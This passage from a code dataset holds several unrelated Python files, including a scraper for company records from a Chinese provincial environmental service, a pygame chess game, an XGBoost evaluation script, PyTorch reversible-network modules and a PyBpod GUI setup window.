)\n\n\n\n","sub_path":"ppt/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653087069","text":"'''\n获取排放废气的公司的详细信息\n'''\nimport pyamf\nfrom pyamf.flex import messaging\nimport uuid\nimport requests\nimport datetime\nfrom pyamf import remoting\nfrom pyamf.flex import messaging\nfrom pyquery import PyQuery as pq\nfrom contextlib import closing\n\nfrom t3c.manager.db import DB\nfrom common_class import GetGasCommpanyData, ParseFlash\n\nclass GetGasCompanyDetial(object):\n\n def __init__(self):\n super(GetGasCompanyDetial, self).__init__()\n self.url = 'http://111.75.227.207:9180/eipp/messagebroker/amf'\n self.session = requests.Session()\n self.db = DB()\n\n def get_company_detial(self, company_id):\n message = ['getEnterpriseReportDetail', '', 'EnterpriseBasService']\n body = ['2017']\n\n body.insert(0, company_id)\n resp = ParseFlash().amf(message, body, self.url)\n\n if resp.ok:\n resp_msg = remoting.decode(resp.content).bodies[0][1]\n content = list(resp_msg.body.body)\n\n return content[0]\n\n def update_insert(self, insert, update, contents):\n with closing(self.db.engine.connect()) as cn:\n res = cn.execute(update, contents)\n\n if not res.rowcount:\n cn.execute(insert, contents)\n\n def save_detial(self, datas):\n insert_sql = 'INSERT INTO \"plant_app_tcx\".\"tb_enterprise\" (qy_corporation,qy_id,qy_address,'\\\n 'province_id,qy_link_phone,qy_wrylx,qy_name,qy_industry,qy_auto_monitor_operation_style)'\\\n 'VALUES (%(qy_corporation)s,%(qy_id)s,%(qy_address)s,%(province_id)s,%(qy_link_phone)s,'\\\n '%(qy_wrylx)s,%(qy_name)s,%(qy_industry)s,%(qy_auto_monitor_operation_style)s);'\n\n update_sql = 'UPDATE \"plant_app_tcx\".\"tb_enterprise\" SET qy_corporation=%(qy_corporation)s,'\\\n 'qy_address=%(qy_address)s,qy_link_phone=%(qy_link_phone)s,qy_wrylx=%(qy_wrylx)s,qy_name=%(qy_name)s,'\\\n 'qy_industry=%(qy_industry)s,qy_auto_monitor_operation_style=%(qy_auto_monitor_operation_style)s '\\\n 'WHERE ( qy_id=%(qy_id)s AND province_id=%(province_id)s);'\n\n for data in datas:\n try:\n con = {}\n con['qy_name'] = data['enterPriseName']\n con['qy_corporation'] = data['legalPerson']\n con['qy_link_phone'] = 
data['officePhone']\n con['qy_address'] = data['address']\n con['qy_industry'] = data['industryTypeName']\n con['qy_wrylx'] = data['monitorTypeName']\n con['province_id'] = int(36000000)\n con['qy_id'] = str(int(data['enterPriseId']))\n con['qy_auto_monitor_operation_style'] = '自动监测和手工监测'\n\n self.update_insert(insert_sql, update_sql, con)\n\n except Exception as e:\n print(e)\n\n def save_all_company_detial(self):\n company_id_list = GetGasCommpanyData().all_gas_company_name_company_id()\n company_detial_lists = []\n\n for item in company_id_list:\n company_detial_lists.append(self.get_company_detial(item[1]))\n\n self.save_detial(company_detial_lists)\n\nif __name__ == '__main__':\n t = GetGasCompanyDetial()\n t.save_all_company_detial()\n","sub_path":"江西环保局各排废气的厂污染数据抓取/江西环保l/get_gas_company_info.py","file_name":"get_gas_company_info.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"338169672","text":"import leviChess as lc\n\n##initialization \n\nBOARD_OFFSET_X = 79\nBOARD_OFFSET_Y = 79\nSPRITE_SIZE = 79\n\n#dictionary of every square coordinate, as strings. e.g. \"e4\"\n#from black POV\nboard = {chr(72 - j) + str(i + 1):[(BOARD_OFFSET_X + (j * SPRITE_SIZE), BOARD_OFFSET_Y + (i * SPRITE_SIZE))] for i in range(8) for j in range(8)}\nprint(board)\n\n#lc.init_graphics()\nlc.pygame.init()\nsize = width, height = 768, 768 #screen size\nscreen = lc.pygame.display.set_mode(size) #create screen\nlc.pygame.display.set_caption('Levi\\'s Chess')\nlc.pygame.mouse.set_visible(1)\n\n#load board asset\nbackground = lc.pygame.image.load(\"assets/chess_board.png\")\nbackground_rect = background.get_rect()\n\n#store all pieces in list\npieces = []\n#instantiate pieces, add to piece list\npieces.extend([lc.Piece(\"white\", \"pawn\", chr(65 + num) + str(2), board) for num in range(8)])\npieces.extend([lc.Piece(\"black\", \"pawn\", chr(65 + num) + str(7), board) for num in range(8)])\npieces.extend([lc.Piece(\"white\", \"rook\", chr(65 + (num * 7)) + str(1), board) for num in range(2)])\npieces.extend([lc.Piece(\"black\", \"rook\", chr(65 + (num * 7)) + str(8), board) for num in range(2)])\npieces.extend([lc.Piece(\"white\", \"knight\", chr(65 + ((num * 5) + 1)) + str(1), board) for num in range(2)])\npieces.extend([lc.Piece(\"black\", \"knight\", chr(65 + ((num * 5) + 1)) + str(8), board) for num in range(2)])\npieces.extend([lc.Piece(\"white\", \"bishop\", chr(65 + ((num * 3) + 2)) + str(1), board) for num in range(2)])\npieces.extend([lc.Piece(\"black\", \"bishop\", chr(65 + ((num * 3) + 2)) + str(8), board) for num in range(2)])\npieces.extend([lc.Piece(\"white\", \"queen\", \"D1\", board)])\npieces.extend([lc.Piece(\"black\", \"queen\", \"D8\", board)])\npieces.extend([lc.Piece(\"white\", \"king\", \"E1\", board)])\npieces.extend([lc.Piece(\"black\", \"king\", \"E8\", board)])\n\n#white to move first\nturn = 0\n#true when a piece has been clicked already, removes need for nested loops\npiece_selected = 0\n\n#create container for sprites\nallsprites = lc.pygame.sprite.RenderPlain(pieces)\n\n#init gameclock to spare cpu usage\nclock = lc.pygame.time.Clock()\n\n#main loop\nwhile 1:\n\tclock.tick(60)\n\n\t#this will restrict moveable pieces based on turn\n\tif turn == 0:\n\t\tto_move = \"white\"\n\telif turn == 1:\n\t\tto_move = \"black\"\n\n\t#render board\n\tscreen.blit(background, background_rect)\n\n\t#draw all sprites (TODO: ...that aren't captured)\n\tallsprites.draw(screen)\n\n\t#update 
display\n\tlc.pygame.display.flip()\n\n\t#get updated event queue\n\tev = lc.pygame.event.get()\n\n\t#select piece with a click, move the piece with the next click\n\tfor event in ev:\n\t\t#if a piece is clicked and none are currently selected\n\t\tif event.type == lc.pygame.MOUSEBUTTONDOWN and piece_selected == 0:\n\t\t\t#get click position\n\t\t\tpos = lc.pygame.mouse.get_pos()\n\n\t\t\t# get a list of all sprites that are under the mouse cursor\n\t\t\tclicked_sprites = [s for s in pieces if s.rect.collidepoint(pos)]\n\t\t\tif clicked_sprites:\n\t\t\t\t#if the piece has been clicked and it is the right team's turn\n\t\t\t\tif clicked_sprites[0].color == to_move:\n\n\t\t\t\t\t#enlarge selected piece for emphasis\n\t\t\t\t\tclicked_sprites[0].image = lc.pygame.transform.smoothscale(\\\n\t\t\t\t\t\tclicked_sprites[0].image, (80, 80))\n\n\t\t\t\t\t#recenter enlarged sprite\n\t\t\t\t\tclicked_sprites[0].rect = clicked_sprites[0].rect.move(\\\n\t\t\t\t\t\t(-12, -12))\n\n\t\t\t\t\t#next click will move the piece instead of selecting another sprite\n\t\t\t\t\tpiece_selected = 1\n\t\t\t\t\tprint(clicked_sprites[0].image)\n\n\t\t\t\t#if piece selected out of turn\n\t\t\t\telif clicked_sprites[0].color != to_move:\t\n\t\t\t\t\tprint(\"wrong turn\")\n\t\t\t\t\t\n\n\n\t\t\tprint(\"1st click selected \", clicked_sprites, piece_selected)\n\n\t\t#if a piece has been selected and needs to move\n\t\telif event.type == lc.pygame.MOUSEBUTTONDOWN and piece_selected == 1:\n\t\t\t#reset piece selection for next click\n\t\t\tpiece_selected = 0\n\n\t\t\t#get new click pos\n\t\t\tpos2 = lc.pygame.mouse.get_pos()\n\t\t\tprint(\"pos2\", pos2)\n\t\t\t#check if another piece was clicked on, if it's the same color, \n\t\t\t#select it instead of moving (unless king is castling)\n\t\t\t# get a list of all sprites that are under the mouse cursor\n\t\t\tnew_clicked_sprites = [p for p in pieces if p.rect.collidepoint(pos2)]\n\t\t\tprint(new_clicked_sprites)\n\t\t\t\n\t\t\t#logic for castling must be handled separately\n\t\t\t# if ((clicked_sprites[0].rank == \"king\" and new_clicked_sprites[0].rank == \"rook\")\\\n\t\t\t# and (clicked_sprites[0].color == to_move and new_clicked_sprites[0].color == to_move):\n\t\t\t# \tprint(\"castle attempted, no logic yet\")\n\t\t\t\n\t\t\t#if another piece is clicked on (instead of open square)\n\t\t\tif new_clicked_sprites:\n\n\t\t\t\t#if the player tries to move to a square they already occupy\n\t\t\t\tif new_clicked_sprites[0].color == to_move:\n\t\t\t\t\t#just select that new piece\n\t\t\t\t\t#enlarge selected piece for emphasis\n\t\t\t\t\tnew_clicked_sprites[0].image = lc.pygame.transform.smoothscale(\\\n\t\t\t\t\tnew_clicked_sprites[0].image, (80, 80))\n\n\t\t\t\t\t#unenlarge the old piece\n\t\t\t\t\tclicked_sprites[0].image = lc.pygame.transform.smoothscale(\\\n\t\t\t\t\tclicked_sprites[0].image, (60, 60))\n\n\t\t\t\t\t#recenter enlarged sprite\n\t\t\t\t\tnew_clicked_sprites[0].rect = new_clicked_sprites[0].rect.move(\\\n\t\t\t\t\t\t(-12, -12))\n\n\t\t\t\t\t#next click will move the piece instead of selecting another sprite\n\t\t\t\t\tpiece_selected = 1\n\t\t\t\t\tprint(new_clicked_sprites[0].image)\n\t\t\t\n\t\t\t#if an open square is clicked\n\t\t\telse:\n\t\t\t\t#un-enlarge piece for placement\n\t\t\t\tclicked_sprites[0].image, clicked_sprites[0].rect = lc.load_image(\\\n\t\t\t\t\tclicked_sprites[0].color + \"_\" + clicked_sprites[0].rank + \".png\", -1)\n\n\t\t\t\t#get the square that was clicked on \n\t\t\t\tnew_square = 
resolveSquare(pos2)\n\t\t\t\tprint(new_square)\n\t\t\t\t#pull the corresponding coordinate from board dict, render piece there\n\t\t\t\tclicked_sprites[0].rect.topleft = board[new_square][0]\n\t\t\t\t\n\t\t\t\t#let another piece get selected \n\t\t\t\tprint(\"second click\", piece_selected)\n\n\t\t\t\t#erase list of clicked sprites\n\t\t\t\tclicked_sprites = []\n\t\t\t\tprint(\"sprites selected after 2nd click \", clicked_sprites)\n\n\t\t\t\t#change turns\n\t\t\t\tturn = turn ^ 1\n\n\t#erase queue to make way for fresh clicks\n\tlc.pygame.event.clear()\n\t\n\tdef resolveSquare(mouse_click):\n\t\tselectedRow = lc.math.floor(mouse_click[1] / 79)\n\t\tselectedCol = lc.math.floor(mouse_click[0] / 79) - 1\n\t\t#convert column to character\n\t\tselectedCol = chr(72 -selectedCol)\n\t\tnew_square = selectedCol + str(selectedRow)\n\t\t#return square\n\t\tprint(mouse_click)\n\t\tprint(new_square)\n\t\treturn new_square","sub_path":"chess-game.py","file_name":"chess-game.py","file_ext":"py","file_size_in_byte":6328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"500153981","text":"# coding=utf-8\n\n\ndef make_type_consistent(s1, s2):\n \"\"\"If both objects aren't either both string or unicode instances force them to unicode\"\"\"\n if isinstance(s1, str) and isinstance(s2, str): return s1, s2\n elif isinstance(s1, unicode) and isinstance(s2, unicode): return s1, s2\n else: return unicode(s1), unicode(s2)\n\n\ndef similarity(a,b):\n import difflib\n from constants import no_name_value\n if len(a)==0 or len(b)==0:\n return no_name_value\n a,b = make_type_consistent(a,b)\n a,b = a.lower(), b.lower()\n match_size = sum([m.size for m in difflib.SequenceMatcher(a=a, b=b, autojunk=False).get_matching_blocks()])*1.0\n longer_size, shorter_size = (len(b),len(a)) if len(a)<len(b) else ((len(a),len(b)))\n longer_size = shorter_size if (longer_size/1.5)<=shorter_size else longer_size/1.5\n# return match_size/(longer_size+shorter_size)*2\n return match_size/shorter_size\n\n\ndef change_ext(fn, new_ext):\n import os\n base = os.path.splitext(fn)[0]\n if not new_ext.startswith('.'):\n new_ext = '.' 
+ new_ext\n return base + new_ext\n\n\ndef add_suffix(fn, suf):\n import os\n base, ext = os.path.splitext(fn)\n return base + suf + ext\n\n\ndef costs(start_time):\n import datetime\n dnow = datetime.datetime.now()\n delta = dnow - start_time\n delta_total_seconds_int = int(delta.total_seconds())\n return 'now = %s, costs = %d days %02d:%02d:%02d = %d seconds' % (dnow.strftime('%Y-%m-%d %H:%M:%S'),\n delta_total_seconds_int / 3600 / 24,\n delta_total_seconds_int / 3600 % 24,\n delta_total_seconds_int / 60 % 60,\n delta_total_seconds_int % 60,\n delta_total_seconds_int)\n","sub_path":"open_data_analysis/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"169163402","text":"#!/usr/bin/python\n\nimport pandas as pd\nfrom sklearn import model_selection\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import *\nfrom keras.utils import to_categorical\nimport pickle\nimport json\nimport xgboost as xgb\nimport time\nimport numpy as np\nimport sys\nimport os\nsys.path.insert(0, '/user-home/.scripts/common-helpers')\nimport published_model_util\nimport numpy as np\n\n# define variables\nargs={\"threshold\": {\"metric\": \"areaUnderROC\", \"min_value\": 0.65, \"mid_value\": 0.85}, \"published\": \"false\", \"dataset\": \"/datasets/banking_loans_default_eval.csv\"}\nmodel_path = os.getenv(\"DSX_PROJECT_DIR\")+\"/models/XGBDefault/1/model\"\nif(False):\n input_data = args.get(\"dataset\")\nelse:\n input_data = os.getenv(\"DSX_PROJECT_DIR\")+args.get(\"dataset\")\nuser_id = os.environ['DSX_USER_ID']\nproject_name = os.environ['DSX_PROJECT_NAME']\n\n\n# load the input data\ndf1 = pd.read_csv(input_data)\n\ny_true = df1[[u'DEFAULT']].values.flatten()\nX = df1[[u'NUM_CARD_APPLS', u'CUST_ACQ_YR', u'NUM_PRODUCTS', u'HOME_BRANCH_CTY', u'AVG_CARD_BAL', u'CLNTS_IN_HSHLD', u'SALESPERSON_ID', u'CREDIT_SCORE', u'GENDER', u'AVG_MORTGAGE_PYMNT', u'NUM_LATE_PYMNTS', u'SATISFACTION', u'BANKRUPTCY_LAST_7YRS', u'INIT_MORTG_AMT', u'NUM_ADDR_CHNGS', u'EQUITIES_BAL', u'HOME_BRANCH_ST', u'AVG_CASH_BAL', u'CHURN', u'AGE_RNG', u'CUST_TYPE']]\n\nserialization = \"xgboost\"\n\n\npublished_path = ''\n# if published use model path\nif(args.get('published').lower() == 'true'):\n copy_result = json.loads(published_model_util.copy_model(project_name, \"XGBDefault\"))\n if(copy_result['code'] == 200):\n model_path = copy_result['path'] + \"/model\"\n published_path = copy_result['path']\n else:\n raise Exception('Unable to evaluate published model: ' + copy_result['description'])\n\n# load the model from disk \nif serialization == 'xgboost':\n X = xgb.DMatrix(X.as_matrix())\n loaded_model = xgb.Booster()\n loaded_model.load_model(model_path)\nelse:\n loaded_model = xgboost.load(open(model_path, 'rb'))\n\n# predictions\ny_pred = loaded_model.predict(X)\ny_classes = pd.DataFrame(y_pred).apply(np.argmax, axis=1)\n\nif(len(y_pred.shape) == 1):\n y_pred = y_pred.round().astype(int)\n\n# Create Evalutation JSON\nevaluation = dict()\nevaluation[\"metrics\"] = dict()\n\n# Classification Metrics\nthreshold={u'metric': 'areaUnderROC', u'min_value': 0.65, u'mid_value': 0.85}\n\nif (len(y_true.shape)==1):\n y_true_1d = y_true\n y_true_2d = to_categorical(y_true)\n\nelse:\n y_true_1d = np.argmax(y_true,axis=1)\n y_true_2d = y_true\n\nif (len(y_pred.shape)==1):\n y_pred_1d = y_pred\n y_pred_2d = to_categorical(y_pred)\n\nelse:\n y_pred_1d = np.argmax(y_pred,axis=1)\n y_pred_2d = 
y_pred\n\n\nevaluation[\"metrics\"][\"accuracyScore\"] = accuracy_score(y_true_1d, y_pred_1d)\nevaluation[\"metrics\"][\"precisionScore\"] =precision_score(y_true_1d,y_pred_1d, average=\"weighted\")\nevaluation[\"metrics\"][\"recallScore\"] = recall_score(y_true_1d,y_pred_1d, average=\"weighted\")\nevaluation[\"metrics\"][\"areaUnderROC\"] = roc_auc_score(y_true_2d,y_pred_2d)\nevaluation[\"metrics\"][\"threshold\"] = threshold\n\nif(evaluation[\"metrics\"][threshold.get('metric','INVALID_METRIC')] >= threshold.get('mid_value', 0.70)):\n evaluation[\"performance\"] = \"good\"\nelif(evaluation[\"metrics\"][threshold.get('metric','INVALID_METRIC')] <= threshold.get('min_value', 0.25)):\n evaluation[\"performance\"] = \"poor\"\nelse:\n evaluation[\"performance\"] = \"fair\"\n\nevaluation[\"modelName\"] = \"XGBDefault\"\nevaluation[\"startTime\"] = int(time.time())\n\nif(args.get('published').lower() == 'true'):\n evaluations_file_path = published_path +'/evaluations.json'\n evaluation[\"deployment\"] = \"default\"\nelse:\n evaluations_file_path = os.getenv(\"DSX_PROJECT_DIR\") + '/models/' + \"XGBDefault\" + '/' + \"latest\" + '/evaluations.json'\n evaluation[\"modelVersion\"] = \"latest\"\n\nif(os.path.isfile(evaluations_file_path)):\n current_evaluations = json.load(open(evaluations_file_path))\nelse:\n current_evaluations = []\ncurrent_evaluations.append(evaluation)\n\nwith open(evaluations_file_path, 'w') as outfile:\n json.dump(current_evaluations, outfile, indent=4, sort_keys=True)\n\n#copy to dir with helper function\nif (len(published_path) > 0):\n published_model_util.update_evaluation_metrics(project_name, \"XGBDefault\")\n published_model_util.delete_temp_model()","sub_path":"FSS_DEMO/scripts/XGBDefaultEval.py","file_name":"XGBDefaultEval.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"83042820","text":"import torch\nfrom torch import nn\nfrom .functional import reversible_block_forward\n\n\nclass LSHSelfAttention(nn.Module):\n def __init__(self):\n super(LSHAttention, self).__init__()\n\n def forward(self, x):\n return\n\n\nclass ChunkedFeedForward(nn.Module):\n def __init__(self):\n super(ChunkedFeedForward, self).__init__()\n\n def forward(self, x):\n return\n\n\nclass ReversibleBlock(nn.Module):\n # TODO check that it is contained in a reversible container or has access to an output stack in some other way?\n def __init__(self, f, g):\n super(ReversibleBlock, self).__init__()\n self.f = f\n self.g = g\n self.output_stack = None\n\n def forward(self, x):\n # NOTE input channel dim has to be divisible by two\n if self.output_stack is None:\n raise ValueError(\"output_stack of {} has to be set to a stack shared between reversible layers.\".format(self))\n return reversible_block_forward(self.f, self.g, self.output_stack, x, preserve_rng_state=True, dim=1)\n\n\nclass ReversibleSequential(nn.Sequential):\n def __init__(self, *args, output_stack=[]):\n super(ReversibleSequential, self).__init__(*args)\n self.output_stack = output_stack\n # TODO first block should not put its input on the stack\n for module in self:\n assert isinstance(module, ReversibleBlock)\n module.output_stack = self.output_stack\n return\n\n def forward(self, x):\n y = super(ReversibleSequential, self).forward(x)\n self.output_stack.append(y)\n return y\n\n\n# TODO norm\nclass ReversibleConvBlock(ReversibleBlock):\n def __init__(self, channels, kernel_size, padding=0, dilation=1, groups=1, bias=True, 
padding_mode='zeros', alpha=1., dropout=0.5):\n f = None\n if dropout ==0.0:\n f = nn.Conv2d(\n channels, channels, kernel_size,\n stride=1, padding=padding, dilation=dilation,\n groups=groups, bias=bias, padding_mode=padding_mode\n )\n else:\n f = nn.Sequential(\n nn.Conv2d(\n channels, channels, kernel_size,\n stride=1, padding=padding, dilation=dilation,\n groups=groups, bias=bias, padding_mode=padding_mode\n ),\n nn.Dropout(p=dropout)\n )\n nonl = nn.ELU(alpha=alpha)\n super(ReversibleConvBlock, self).__init__(f, nonl)\n\n\n# TODO norm\n# TODO LSH\nclass ReversibleLSHSelfAttentionBlock(ReversibleBlock):\n def __init__(self):\n attn = LSHSelfAttention()\n # TODO chunked ff\n ff = nn.Sequential()\n super(ReversibleLSHSelfAttentionBlock, self).__init__(attn, ff)\n def forward(self, x):\n return\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, dtype=torch.float):\n super(PositionalEncoding, self).__init__()\n self.dtype = dtype\n\n def forward(self, x):\n b, c, l = x.size()\n d = x.device\n y = torch.arange(l, dtype=self.dtype, device=x.device)\n y = y.expand(b, 1, l)\n y = torch.cat((x, y), 1)\n return y\n\n\nclass OuterConcatenation(nn.Module):\n def __init__(self):\n super(OuterConcatenation, self).__init__()\n\n def forward(self, x):\n b, c, l = x.size()\n x1 = x.unsqueeze(-1)\n x1 = x1.expand(b, c, l, l)\n\n x2 = torch.transpose(x1, -1, -2)\n\n return torch.cat((x1, x2), 1)\n","sub_path":"src/nnicotine/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"539746371","text":"# !/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport logging\n\nimport pyforms as app\n\nfrom pyforms.basewidget import BaseWidget\nfrom pyforms.controls import ControlText\nfrom pyforms.controls import ControlList\nfrom pyforms.controls import ControlButton\nfrom pyforms.controls import ControlCombo\nfrom pyforms.controls import ControlCheckBox\nfrom pyforms.controls import ControlCheckBoxList\nfrom pyforms.controls import ControlEmptyWidget\n\nfrom pybpodgui_plugin.models.subject import Subject\nfrom pybpodgui_api.models.setup import Setup\nfrom pybpodgui_api.exceptions.run_setup import RunSetupError\n\nfrom pybpodgui_plugin.models.setup.board_task import BoardTask\nfrom pybpodgui_plugin.models.session import Session\n\nlogger = logging.getLogger(__name__)\n\n\nclass SubjectSelectPopup(BaseWidget):\n\n def __init__(self, subjectlist, selectedsubjects):\n\n super(SubjectSelectPopup, self).__init__('Add Subjects')\n\n self._ok_btn = ControlButton('OK')\n self._cancel_btn = ControlButton('Cancel', default=self.cancel_evt)\n self._subjectslist = ControlCheckBoxList('Subject List')\n\n self._formset = [\n '',\n ('', '_subjectslist', ''),\n ('', '_ok_btn', '_cancel_btn', ''),\n ''\n ]\n\n for subject in sorted([s for s in subjectlist], key=lambda x: x.name.lower()):\n b = False\n for a in selectedsubjects.value:\n if subject.name == a[0]:\n self._subjectslist += (subject, True)\n b = True\n if b is False:\n self._subjectslist += (subject, False)\n\n def ok_evt(self):\n self.close()\n # self.ok_event(self._subjectslist.value)\n\n def closewidnow(self):\n self.close()\n\n def subjectlist(self):\n return self._subjectslist.items\n\n # THIS IS THE WAY WE CREATE A SIGNAL INSIDE PYBPOD (SCROLL DOWN...)\n def ok_event(self, subjects):\n pass\n\n def cancel_evt(self):\n print('cancel')\n self.close()\n\n\nclass SetupWindow(Setup, BaseWidget):\n \"\"\"\n Define here which fields from 
the setup model should appear on the details section.\n\n The model fields shall be defined as UI components like text fields, buttons, combo boxes, etc.\n\n You may also assign actions to these components.\n\n **Properties**\n\n name\n :class:`string`\n\n Name associated with this setup. Returns the current value stored in the :py:attr:`_name` text field.\n\n board\n :class:`pybpodgui_plugin.models.board.board_dockwindow.BoardDockWindow`\n\n Board associated with this setup. Returns the current value stored in the :py:attr:`_board` combo box.\n\n **Private attributes**\n\n _name\n :class:`pyforms.controls.ControlText`\n\n Text field to edit board name. Editing this field fires the event :meth:`SetupWindow._SetupWindow__name_changed_evt`.\n\n _board\n :class:`pyforms.controls.ControlCombo`\n\n Combo box to select board associated with this setup. Editing this field fires the event :meth:`SetupWindow._SetupWindow__board_changed_evt`.\n\n _run_task_btn\n :class:`pyforms.controls.ControlButton`\n\n Button to run task on board. Pressing the button fires the event :meth:`SetupWindow._SetupWindow__run_task`.\n\n _formset\n Describe window fields organization to PyForms.\n\n **Methods**\n\n \"\"\"\n\n def __init__(self, experiment=None):\n \"\"\"\n\n :param experiment: Experiment this setup belongs to.\n \"\"\"\n BaseWidget.__init__(self, 'Experiment')\n self.layout().setContentsMargins(5, 10, 5, 5)\n\n self._name = ControlText('Setup name')\n self._board = ControlCombo('Board')\n\n self._stoptrial_btn = ControlButton('Skip trial', default=self._stop_trial_evt)\n self._pause_btn = ControlButton('Pause', checkable=True, default=self._pause_evt)\n self._run_task_btn = ControlButton('Run',\n checkable=True,\n default=self._run_task,\n helptext=\"When a task is running, you can stop all remaining trials by pressing this button. <br/> <b>NOTE:</b> This means that you will need to break the cycle yourself in your task code when the run_state_machine method returns False.\")\n self._kill_task_btn = ControlButton('Kill',\n default=self._kill_task,\n style=\"background-color:rgb(255,0,0);font-weight:bold;\",\n helptext=\"<b>NOTE:</b>This will exit the task process abruptly. 
The code you might have after the trial loop won't execute.\")\n\n self._subjects_list = ControlList('Subjects', remove_function=self.__remove_subject)\n self._add_subject = ControlButton('Add subject')\n self._allsubjects = ControlCombo('Add subject')\n self._task = ControlCombo('Protocol', changed_event=self._task_changed_evt)\n\n self._detached = ControlCheckBox('Detach from GUI')\n\n self._varspanel = ControlEmptyWidget()\n self._btn = ControlButton('Open')\n\n Setup.__init__(self, experiment)\n\n self.reload_setups()\n self.reload_boards()\n self.reload_tasks()\n\n self._formset = [\n '_name',\n '_board',\n '_task',\n '_detached',\n ('_run_task_btn', '_kill_task_btn'),\n ('_stoptrial_btn', '_pause_btn'),\n #' ',\n {\n 'Subjects': [\n # '_allsubjects',\n '',\n '_add_subject',\n '_subjects_list',\n ],\n 'Variables':[\n '_varspanel',\n ],\n }\n ]\n\n self._kill_task_btn.enabled = False\n self._subjects_list.readonly = True\n self._varspanel.value = self.board_task\n self._add_subject.value = self.__add_subject\n self._name.changed_event = self.__name_changed_evt\n self._board.changed_event = self._board_changed_evt\n\n def slot(self):\n self.clear_subjects()\n listedsubjects = self.sswindow.subjectlist()\n for subj in listedsubjects:\n if subj[1] is True:\n self += subj[0]\n self.sswindow.closewidnow()\n\n def reload_tasks(self, current_selected_task=None):\n # type: (current_selected_task) -> None\n \"\"\"\n Reload tasks now\n\n :param current_selected_task: current selected task\n :type current_selected_task: pybpodgui_plugin.models.task.Task\n \"\"\"\n self._task.clear()\n self._task.add_item('', 0)\n for task in self.project.tasks:\n self._task.add_item(task.name, task)\n self._task.current_index = 0\n if current_selected_task:\n self.task = current_selected_task\n\n def _task_changed_evt(self):\n if hasattr(self, '_update_task'):\n return\n self.task = self._task.value\n\n def __add__(self, obj):\n res = super(SetupWindow, self).__add__(obj)\n if isinstance(obj, Subject):\n self._subjects_list.value = [[s.name] for s in self.subjects]\n return res\n\n def __sub__(self, obj):\n res = super(SetupWindow, self).__sub__(obj)\n if isinstance(obj, Subject):\n self._subjects_list.value = [[s.name] for s in self.subjects]\n return res\n\n def __open_subject_select(self):\n self.sswindow = SubjectSelectPopup(self.project.subjects, self._subjects_list)\n self.sswindow._ok_btn.value = self.slot\n self.sswindow.show()\n\n def __add_subject(self):\n self.__open_subject_select()\n\n def __remove_subject(self):\n if self._subjects_list.selected_row_index is not None:\n name = self._subjects_list.value[self._subjects_list.selected_row_index][0]\n subject = self.project.find_subject(name)\n self -= subject\n self._subjects_list -= -1\n\n def _stop_trial_evt(self):\n self.stop_trial()\n\n def _pause_evt(self):\n if self._pause_btn.checked:\n self.pause_trial()\n else:\n self.resume_trial()\n\n def can_run_task(self):\n try:\n return super().can_run_task()\n except Exception as err:\n self.alert(str(err), \"Unexpected Error\")\n self._run_task_btn.checked = False\n return False\n\n def _run_task(self):\n \"\"\"\n Defines behavior of the button :attr:`SetupWindow._run_task_btn`.\n\n This methods is called every time the user presses the button.\n \"\"\"\n try:\n if self.status == SetupWindow.STATUS_RUNNING_TASK:\n self.stop_task()\n elif self.status == SetupWindow.STATUS_READY:\n self.run_task()\n except RunSetupError as err:\n self.warning(str(err), \"Warning\")\n except Exception as err:\n 
self.alert(str(err), \"Unexpected Error\")\n\n def _kill_task(self):\n \"\"\"\n Kills a running task. This will stop the current trial and exit the task abruptly within the trial loop (if any).\n \"\"\"\n if self.status == SetupWindow.STATUS_RUNNING_TASK:\n self.kill_task()\n\n def _board_changed_evt(self):\n \"\"\"\n React to changes on text field :py:attr:`_board`.\n\n This method is called every time the user changes the field and forces a UI refresh.\n \"\"\"\n if hasattr(self, '_update_board'):\n return\n self.board = self._board.value\n self.update_ui()\n\n def __name_changed_evt(self):\n \"\"\"\n React to changes on text field :py:attr:`_name`.\n\n This methods is called every time the user changes the field.\n \"\"\"\n if not hasattr(self, '_update_name') or not self._update_name:\n self.name = self._name.value\n self.reload_setups()\n\n def reload_setups(self):\n for subject in self.project.subjects:\n subject.reload_setups()\n\n def reload_boards(self, current_selected_board=None):\n \"\"\"\n Reload boards list on combo box\n\n This method is fired by:\n * setup creation: :py:meth:`pybpodgui_plugin.models.setup.setup_window.SetupWindow._SetupWindow__init__`.\n * setup details section focus (dockwindow): :py:meth:`pybpodgui_plugin.models.setup.setup_dockwindow.SetupDockWindow.show`.\n\n :param current_selected_board: optional specify current selected board to restore after list update\n \"\"\"\n self._board.clear()\n self._board.add_item('', 0)\n for board in self.project.boards:\n self._board.add_item(board.name, board)\n self._board.current_index = 0\n\n if current_selected_board:\n self.board = current_selected_board\n\n self._allsubjects.clear()\n self._allsubjects.add_item('', 0)\n for subject in sorted([s for s in self.project.subjects], key=lambda x: x.name.lower()):\n self._allsubjects.add_item(subject.name, subject)\n self._allsubjects.current_index = 0\n\n self._subjects_list.value = [[s.name] for s in self.subjects]\n\n def create_board_task(self):\n \"\"\"\n Creates a new board task by calling the API.\n\n .. seealso::\n :py:class:`pybpodgui_api.models.setup.board_task.BoardTask`.\n \"\"\"\n return BoardTask(self)\n\n def create_session(self):\n \"\"\"\n Creates a new session by calling the API.\n\n .. 
